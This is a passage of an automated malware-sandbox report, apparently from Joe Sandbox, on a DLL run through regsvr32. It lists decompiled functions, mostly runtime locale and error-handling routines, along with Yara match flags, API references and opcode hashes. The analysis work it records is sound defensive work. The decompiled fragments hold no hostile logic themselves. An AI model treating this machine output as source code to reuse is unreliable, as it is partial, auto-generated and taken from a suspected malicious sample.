                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 0469a975ba72b5f9f0dbed9c246675a6a9a07adba44d3414d25307e1532eaf14
                                                                                                    • Instruction ID: da98bab851973f2be39f41fcc645d5f70cd1361b1e939770dee42ddcfbc1a9c6
                                                                                                    • Opcode Fuzzy Hash: 0469a975ba72b5f9f0dbed9c246675a6a9a07adba44d3414d25307e1532eaf14
                                                                                                    • Instruction Fuzzy Hash: 92E12C36704B8485E762DB61E4807EE27A4F7997C8F428A26AF9D57796EF34C349C300
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 026163E4 Relevance: 1.6, Strings: 1, Instructions: 346COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 21>
                                                                                                    • API String ID: 0-610556708
                                                                                                    • Opcode ID: 679d12df98bee7c3577e1cb31877e6a931cbc37b86c2e5cc71252cb31a00da80
                                                                                                    • Instruction ID: a0f5c734fcd5571d3ef835838db8aee95876aaa251906b066ba2cbab7d7e3fe8
                                                                                                    • Opcode Fuzzy Hash: 679d12df98bee7c3577e1cb31877e6a931cbc37b86c2e5cc71252cb31a00da80
                                                                                                    • Instruction Fuzzy Hash: 0DF1E6B0D0461C9FDB58DFA8D48A9DDBBF1FB08384F44411AE806B7290D7749919CFA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180040EB4 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 62%
                                                                                                    			E00000001180040EB4(void* __ecx, signed int __edx, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long _a16, long long _a24) {
				void* _v8;
				signed int _v24;
				char _v264;
				unsigned int _t22;
				signed int _t23;
				void* _t25;
				unsigned int _t33;
				signed int _t39;
				signed long long _t52;
				signed long long _t53;
				void* _t55;
				void* _t63;
				unsigned int* _t66;
				intOrPtr* _t68;
				void* _t70;

				_t63 = __rdx;
				_t39 = __edx;
				_a16 = __rbx;
				_a24 = __rsi;
				_t52 =  *0x8005d010; // 0xb03f6156e10
				_t53 = _t52 ^ _t70 - 0x00000120;
				_v24 = _t53;
				_t55 = __rcx;
				E0000000118002C43C(_t53, __rcx);
				_t4 = _t53 + 0x98; // 0x98
				_t68 = _t4;
				E0000000118002C43C(_t53, _t55);
				_t66 =  *((intOrPtr*)(_t53 + 0x3a0));
				_t22 = E00000001180040FB0(_t55, _t63);
				r9d = 0x78;
				_t33 = _t22;
				asm("sbb edx, edx");
				_t23 = GetLocaleInfoW(??, ??, ??, ??);
				if (_t23 != 0) goto 0x80040f30;
				 *_t66 =  *_t66 & _t23;
				goto 0x80040f8b;
				_t25 = E000000011800441B8((_t39 & 0xfffff002) + 0x1001, _t53,  *_t68,  &_v264);
				if (_t25 != 0) goto 0x80040f4b;
				if ( *((intOrPtr*)(_t68 + 0x18)) != _t25) goto 0x80040f78;
				_t10 = _t53 + 1; // 0x1
				goto 0x80040f6a;
				if ( *((intOrPtr*)(_t68 + 0x18)) != 0) goto 0x80040f81;
				if ( *((intOrPtr*)(_t68 + 0x14)) == 0) goto 0x80040f81;
				if (E000000011800441B8(_t10, _t53,  *_t68,  &_v264) != 0) goto 0x80040f81;
				if (E000000011800410D8(_t33, 0, _t53, _t55,  *_t68,  &_v264, _t68) == 0) goto 0x80040f81;
				 *_t66 =  *_t66 | 0x00000004;
				_t66[1] = _t33;
				_t66[2] = _t33;
				return E000000011800010E0( !( *_t66 >> 2) & 0x00000001, _t33, _v24 ^ _t70 - 0x00000120);
			}


















                                                                                                    0x180040eb4
                                                                                                    0x180040eb4
                                                                                                    0x180040eb4
                                                                                                    0x180040eb9
                                                                                                    0x180040ec6
                                                                                                    0x180040ecd
                                                                                                    0x180040ed0
                                                                                                    0x180040ed8
                                                                                                    0x180040edb
                                                                                                    0x180040ee0
                                                                                                    0x180040ee0
                                                                                                    0x180040ee7
                                                                                                    0x180040eef
                                                                                                    0x180040ef6
                                                                                                    0x180040f05
                                                                                                    0x180040f0d
                                                                                                    0x180040f0f
                                                                                                    0x180040f1d
                                                                                                    0x180040f25
                                                                                                    0x180040f27
                                                                                                    0x180040f2e
                                                                                                    0x180040f38
                                                                                                    0x180040f3f
                                                                                                    0x180040f44
                                                                                                    0x180040f46
                                                                                                    0x180040f49
                                                                                                    0x180040f4f
                                                                                                    0x180040f55
                                                                                                    0x180040f66
                                                                                                    0x180040f76
                                                                                                    0x180040f78
                                                                                                    0x180040f7b
                                                                                                    0x180040f7e
                                                                                                    0x180040faf

                                                                                                    APIs
                                                                                                      • Part of subcall function 000000018002C43C: GetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C446
                                                                                                      • Part of subcall function 000000018002C43C: SetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C4C4
                                                                                                      • Part of subcall function 000000018002C43C: abort.LIBCMT ref: 000000018002C4CA
                                                                                                      • Part of subcall function 000000018002C43C: SetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C4AE
                                                                                                    • GetLocaleInfoW.KERNEL32 ref: 0000000180040F1D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$InfoLocaleabort
                                                                                                    • String ID:
                                                                                                    • API String ID: 3293382891-0
                                                                                                    • Opcode ID: 7d024eb8dd67398f1ed7bf1573138d70402d47dd1d286ca437f5d4885e2ee46e
                                                                                                    • Instruction ID: 57ef6879d3ac7b95c8ea49c11dc6b6520b05774b9fc8d78b75e872880e908fce
                                                                                                    • Opcode Fuzzy Hash: 7d024eb8dd67398f1ed7bf1573138d70402d47dd1d286ca437f5d4885e2ee46e
                                                                                                    • Instruction Fuzzy Hash: 75218132600A8886EBB2DB21E4813D973A0F79C7C8F51C135AB8993696DF78D69DC740
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180040AE0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 17%
                                                                                                    			E00000001180040AE0(void* __ecx, void* __edx, void* __rax, long long __rbx, signed int* __rcx, void* __rdx, signed int __r8, long long _a8) {
				signed int _t35;
				signed char _t36;
				signed char _t37;
				signed int _t52;
				void* _t54;
				signed int* _t58;
				signed short** _t65;
				signed long long _t70;
				signed long long _t71;
				signed long long _t73;

				_t54 = __rax;
				_a8 = __rbx;
				_t58 = __rcx;
				E0000000118002C43C(__rax, __rcx);
				_t70 = __r8 | 0xffffffff;
				_t2 = _t54 + 0x98; // 0x98
				_t65 = _t2;
				_t73 = _t70 + 1;
				if (( *_t65)[_t73] != 0) goto 0x80040b05;
				_t65[3] = 0 | _t73 == 0x00000003;
				_t71 = _t70 + 1;
				if (_t65[1][_t71] != 0) goto 0x80040b1f;
				r8d = 2;
				_t65[3] = 0 | _t71 == 0x00000003;
				_t58[1] = 0;
				if (_t65[3] != 0) goto 0x80040b6e;
				r10d = 0;
				r9d =  *( *_t65) & 0x0000ffff;
				_t16 = _t73 - 0x41; // 0x58
				if (_t16 - 0x19 <= 0) goto 0x80040b66;
				r9w = r9w - 0x61;
				if (r9w - 0x19 > 0) goto 0x80040b6b;
				r10d =  &(r10d[0]);
				goto 0x80040b49;
				r8d = r10d;
				_t65[2] = r8d;
				_t35 = EnumSystemLocalesW(??, ??);
				_t52 =  *_t58 & 0x00000007;
				asm("bt ecx, 0x9");
				_t36 = _t35 & 0xffffff00 | _t52 > 0x00000000;
				asm("bt ecx, 0x8");
				_t37 = _t36 & 0xffffff00 | _t52 > 0x00000000;
				if ((_t37 & (0 | _t52 != 0x00000000) & _t36) != 0) goto 0x80040ba2;
				 *_t58 = 0;
				return _t37;
			}













                                                                                                    0x180040ae0
                                                                                                    0x180040ae0
                                                                                                    0x180040aea
                                                                                                    0x180040aed
                                                                                                    0x180040af2
                                                                                                    0x180040afb
                                                                                                    0x180040afb
                                                                                                    0x180040b05
                                                                                                    0x180040b0d
                                                                                                    0x180040b18
                                                                                                    0x180040b1f
                                                                                                    0x180040b27
                                                                                                    0x180040b2f
                                                                                                    0x180040b38
                                                                                                    0x180040b3b
                                                                                                    0x180040b41
                                                                                                    0x180040b46
                                                                                                    0x180040b49
                                                                                                    0x180040b50
                                                                                                    0x180040b58
                                                                                                    0x180040b5a
                                                                                                    0x180040b64
                                                                                                    0x180040b66
                                                                                                    0x180040b69
                                                                                                    0x180040b6b
                                                                                                    0x180040b6e
                                                                                                    0x180040b7e
                                                                                                    0x180040b86
                                                                                                    0x180040b8c
                                                                                                    0x180040b90
                                                                                                    0x180040b95
                                                                                                    0x180040b99
                                                                                                    0x180040b9e
                                                                                                    0x180040ba0
                                                                                                    0x180040bac

                                                                                                    APIs
                                                                                                      • Part of subcall function 000000018002C43C: GetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C446
                                                                                                      • Part of subcall function 000000018002C43C: SetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C4C4
                                                                                                      • Part of subcall function 000000018002C43C: abort.LIBCMT ref: 000000018002C4CA
                                                                                                    • EnumSystemLocalesW.KERNEL32(?,?,?,0000000180041313,?,?,?,00000000,00000001,00000000,?,0000000180036E6D), ref: 0000000180040B7E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystemabort
                                                                                                    • String ID:
                                                                                                    • API String ID: 2459050469-0
                                                                                                    • Opcode ID: 491b6ad1c3d74ee4059d82c8a69a7dd85b3e8f5894f44c336598b74dae44016e
                                                                                                    • Instruction ID: 95e960b5e9ea0fbbb5655aa408645a8e22307ce6b88c32c75a645bb768c4a072
                                                                                                    • Opcode Fuzzy Hash: 491b6ad1c3d74ee4059d82c8a69a7dd85b3e8f5894f44c336598b74dae44016e
                                                                                                    • Instruction Fuzzy Hash: 5111C073A14A488AEB568F26D0807ED77A0F388BE8F668115E665533C0CF34C6D5C788
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02621888 Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: #Ks
                                                                                                    • API String ID: 0-3349194579
                                                                                                    • Opcode ID: 83e5a50dd5c9161b71c46e007b2b040474654541c5774b12a42e7b9f31cc6b2a
                                                                                                    • Instruction ID: de2916d28840408da1a11f1b3e0709c225c46a42783fed111c4ee4d5374e81f9
                                                                                                    • Opcode Fuzzy Hash: 83e5a50dd5c9161b71c46e007b2b040474654541c5774b12a42e7b9f31cc6b2a
                                                                                                    • Instruction Fuzzy Hash: F30264B5902349CFDB98DF28C2CA59E7BF1BF55304F404029FC1A9A2A4D3B4D528CB49
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800410D8 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 000000018002C43C: GetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C446
                                                                                                      • Part of subcall function 000000018002C43C: SetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C4C4
                                                                                                      • Part of subcall function 000000018002C43C: abort.LIBCMT ref: 000000018002C4CA
                                                                                                    • GetLocaleInfoW.KERNEL32(?,?,?,0000000180040E70), ref: 000000018004110F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$InfoLocaleabort
                                                                                                    • String ID:
                                                                                                    • API String ID: 3293382891-0
                                                                                                    • Opcode ID: 7823aca92fce743afef36ee758bbcfb188be3ba5530973efd0065a37ab30bece
                                                                                                    • Instruction ID: 22c7026c2cacfa9a4d7abb207c1ebbef009cb0c3807388d375b7c8ecabe90372
                                                                                                    • Opcode Fuzzy Hash: 7823aca92fce743afef36ee758bbcfb188be3ba5530973efd0065a37ab30bece
                                                                                                    • Instruction Fuzzy Hash: F4115C3231499886E7E59B1290807EE2261F3487E9F118221FB35077D4DE35CA858308
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002C718 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099609381-0
                                                                                                    • Opcode ID: faf29ac5cf08912f9c81f8a946ac8162aed031630605abfe2851265321c72983
                                                                                                    • Instruction ID: f521325a7255dfd5e8c4a5c088659abb3b5053a607b30a64641ad70ab64a35f5
                                                                                                    • Opcode Fuzzy Hash: faf29ac5cf08912f9c81f8a946ac8162aed031630605abfe2851265321c72983
                                                                                                    • Instruction Fuzzy Hash: 5D016D72310B4883E755CB25E8847D97362F38DBC0F04D526FA5967768DF39CA598340
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180040BB0 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 25%
                                                                                                    			E00000001180040BB0(void* __ecx, void* __edx, void* __rax, long long __rbx, signed char* __rcx, void* __rdx, signed int __r8, long long _a8) {
				signed int _t15;
				int _t17;
				void* _t30;
				signed char* _t32;
				signed short* _t37;
				signed long long _t44;
				void* _t45;

				_t30 = __rax;
				_a8 = __rbx;
				_t32 = __rcx;
				E0000000118002C43C(__rax, __rcx);
				_t45 = _t30;
				_t37 =  *((intOrPtr*)(_t30 + 0x98));
				_t44 = (__r8 | 0xffffffff) + 1;
				if (_t37[_t44] != 0) goto 0x80040bd2;
				_t15 = 0 | _t44 == 0x00000003;
				 *(_t45 + 0xb0) = _t15;
				if (_t15 != 0) goto 0x80040c1d;
				r9d = 0;
				r8d =  *_t37 & 0x0000ffff;
				if (_t44 - 0x41 - 0x19 <= 0) goto 0x80040c15;
				r8w = r8w - 0x61;
				if (r8w - 0x19 > 0) goto 0x80040c1a;
				r9d = r9d + 1;
				goto 0x80040bf8;
				 *((intOrPtr*)(_t45 + 0xac)) = r9d;
				_t17 = EnumSystemLocalesW(??, ??);
				if (( *_t32 & 0x00000004) != 0) goto 0x80040c3d;
				 *_t32 = 0;
				return _t17;
			}










                                                                                                    0x180040bb0
                                                                                                    0x180040bb0
                                                                                                    0x180040bba
                                                                                                    0x180040bbd
                                                                                                    0x180040bc6
                                                                                                    0x180040bcb
                                                                                                    0x180040bd2
                                                                                                    0x180040bda
                                                                                                    0x180040be7
                                                                                                    0x180040bea
                                                                                                    0x180040bf3
                                                                                                    0x180040bf5
                                                                                                    0x180040bf8
                                                                                                    0x180040c07
                                                                                                    0x180040c09
                                                                                                    0x180040c13
                                                                                                    0x180040c15
                                                                                                    0x180040c18
                                                                                                    0x180040c1d
                                                                                                    0x180040c30
                                                                                                    0x180040c39
                                                                                                    0x180040c3b
                                                                                                    0x180040c47

                                                                                                    APIs
                                                                                                      • Part of subcall function 000000018002C43C: GetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C446
                                                                                                      • Part of subcall function 000000018002C43C: SetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C4C4
                                                                                                      • Part of subcall function 000000018002C43C: abort.LIBCMT ref: 000000018002C4CA
                                                                                                    • EnumSystemLocalesW.KERNEL32(?,?,?,00000001800412CF,?,?,?,00000000,00000001,00000000,?,0000000180036E6D), ref: 0000000180040C30
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystemabort
                                                                                                    • String ID:
                                                                                                    • API String ID: 2459050469-0
                                                                                                    • Opcode ID: 41d93481dc33b9b22400a1b9ef0348612acb1b85f7d90f425fd57ea59047699a
                                                                                                    • Instruction ID: 448143239a3c92f876d717096b73fbf542e8be9c4485bbf8c2279ff39e736b43
                                                                                                    • Opcode Fuzzy Hash: 41d93481dc33b9b22400a1b9ef0348612acb1b85f7d90f425fd57ea59047699a
                                                                                                    • Instruction Fuzzy Hash: 3401D872704A8C86E7925F16E4C07D976E1E758BECF52C321E671572C5DF7486C88708
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002C838 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099609381-0
                                                                                                    • Opcode ID: 91104a63c6a754359448ac1d37bd45fd25a924b6d3125980a547f456ea4c1cb0
                                                                                                    • Instruction ID: 99ca7c889ca250c2dc5309f10d9eef7934a14fba8f4af40d31c34fc86f4093a4
                                                                                                    • Opcode Fuzzy Hash: 91104a63c6a754359448ac1d37bd45fd25a924b6d3125980a547f456ea4c1cb0
                                                                                                    • Instruction Fuzzy Hash: 50F05EF1310A4882FB89CB66EC9439A3362A75D7D0F44E427ED596B758DE3C868E8340
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002C8A8 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: EnumLocalesSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 2099609381-0
                                                                                                    • Opcode ID: 1a36835f4963a32d16b9f5e14f8960b3b3a997de8b68fb4c0c225f8781f9ff62
                                                                                                    • Instruction ID: 527f6c176dc952118c4ff6a9bea85568d56ff8de99664b2d4ea4953630eb2a09
                                                                                                    • Opcode Fuzzy Hash: 1a36835f4963a32d16b9f5e14f8960b3b3a997de8b68fb4c0c225f8781f9ff62
                                                                                                    • Instruction Fuzzy Hash: 5DF0A0B1610A4882F759CBA2EC947EA2322639D7C0F44E526BC542B758DF3D438E8340
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180040A5C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 25%
                                                                                                    			E00000001180040A5C(void* __edx, void* __rax, long long __rbx, signed char* __rcx, signed long long __rdx, long long _a8) {
				int _t15;
				void* _t22;
				signed char* _t25;
				signed long long _t29;
				signed long long _t31;

				_t29 = __rdx;
				_t22 = __rax;
				_a8 = __rbx;
				_t25 = __rcx;
				E0000000118002C43C(__rax, __rcx);
				_t31 = (_t29 | 0xffffffff) + 1;
				if ( *((intOrPtr*)( *((intOrPtr*)(_t22 + 0xa0)) + _t31 * 2)) != 0) goto 0x80040a7e;
				 *(_t22 + 0xb4) = 0 | _t31 == 0x00000003;
				_t15 = EnumSystemLocalesW(??, ??);
				if (( *_t25 & 0x00000004) != 0) goto 0x80040ab0;
				 *_t25 = 0;
				return _t15;
			}








                                                                                                    0x180040a5c
                                                                                                    0x180040a5c
                                                                                                    0x180040a5c
                                                                                                    0x180040a66
                                                                                                    0x180040a69
                                                                                                    0x180040a7e
                                                                                                    0x180040a85
                                                                                                    0x180040a9c
                                                                                                    0x180040aa3
                                                                                                    0x180040aac
                                                                                                    0x180040aae
                                                                                                    0x180040aba

                                                                                                    APIs
                                                                                                      • Part of subcall function 000000018002C43C: GetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C446
                                                                                                      • Part of subcall function 000000018002C43C: SetLastError.KERNEL32(?,?,?,000000018002FE31,?,?,?,?,?,?,?,000000018002FFE9), ref: 000000018002C4C4
                                                                                                      • Part of subcall function 000000018002C43C: abort.LIBCMT ref: 000000018002C4CA
                                                                                                    • EnumSystemLocalesW.KERNEL32 ref: 0000000180040AA3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$EnumLocalesSystemabort
                                                                                                    • String ID:
                                                                                                    • API String ID: 2459050469-0
                                                                                                    • Opcode ID: 6d497200baf9c220ac3402a4b56955e22e62434aa4d6dd6c064cb9e705510c5d
                                                                                                    • Instruction ID: 2beb90e9737c83ece47e035b68f6637efdc0880d6b2360d4873db98b56b5d221
                                                                                                    • Opcode Fuzzy Hash: 6d497200baf9c220ac3402a4b56955e22e62434aa4d6dd6c064cb9e705510c5d
                                                                                                    • Instruction Fuzzy Hash: B7F08272704B8882EB529F66E580399BAE1E798BF4F55C311E774433E5CE78C694C305
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02608D6C Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: wh=
                                                                                                    • API String ID: 0-2234640802
                                                                                                    • Opcode ID: 694b328026cdd5367ffe80aa0744a0672ceab557d23e6e538874d6fec4956cc6
                                                                                                    • Instruction ID: e42d5c2aa36e97419b4331bfcbfae5aec33ed69974b3124c3c6e4cfde970105f
                                                                                                    • Opcode Fuzzy Hash: 694b328026cdd5367ffe80aa0744a0672ceab557d23e6e538874d6fec4956cc6
                                                                                                    • Instruction Fuzzy Hash: 7CB18D35A06608CBDB6CCF68C49999E7BF2FF64304F10421DE816A72A1C778D916DB84
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800202FC Relevance: 1.5, Strings: 1, Instructions: 223COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 53%
                                                                                                    			E000000011800202FC(long long __rbx, signed short* __rcx, long long __rsi, long long __rbp, long long _a16, long long _a24, long long _a32) {
